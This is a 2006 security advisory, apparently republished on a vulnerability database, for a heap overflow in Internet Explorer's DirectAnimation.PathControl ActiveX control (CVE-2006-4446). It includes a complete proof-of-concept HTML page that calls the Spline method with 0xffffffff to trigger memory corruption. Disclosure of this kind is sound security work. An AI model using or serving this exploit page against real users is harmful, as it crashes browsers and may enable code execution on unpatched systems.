Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

2006.08.31
Credit: nop (nop xsec org)
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-4446
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Advisory ID: XSec-06-10 Advisory Name: Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability Release Date: 08/28/2006 Tested on: Windows 2000/XP/2003 Internet Explorer 6.0 SP1 Affected version: Windows 2000 Windows XP Windows 2003 Author: nop <nop#xsec.org> http://www.xsec.org Overview: When Internet Explorer handle DirectAnimation.PathControl COM object(daxctle.ocx) Spline method, Set the first parameter to 0xffffffff will triggers an invalid memory write, That an attacker may DoS and possibly could execute arbitrary code. Exploit: =============== daxctle.htm start ================ <!-- // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability // tested on Windows 2000 SP4/XP SP2/2003 SP1 // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6} // Info: Microsoft DirectAnimation Path // ProgID: DirectAnimation.PathControl // InprocServer32: C:WINNTsystem32daxctle.ocx --!> <html> <head> <title>test</title> </head> <body> <script> var target = new ActiveXObject("DirectAnimation.PathControl"); target.Spline(0xffffffff, 1); </script> </body> </html> =============== daxctle.htm end ================== Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19 About XSec: We are redhat.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top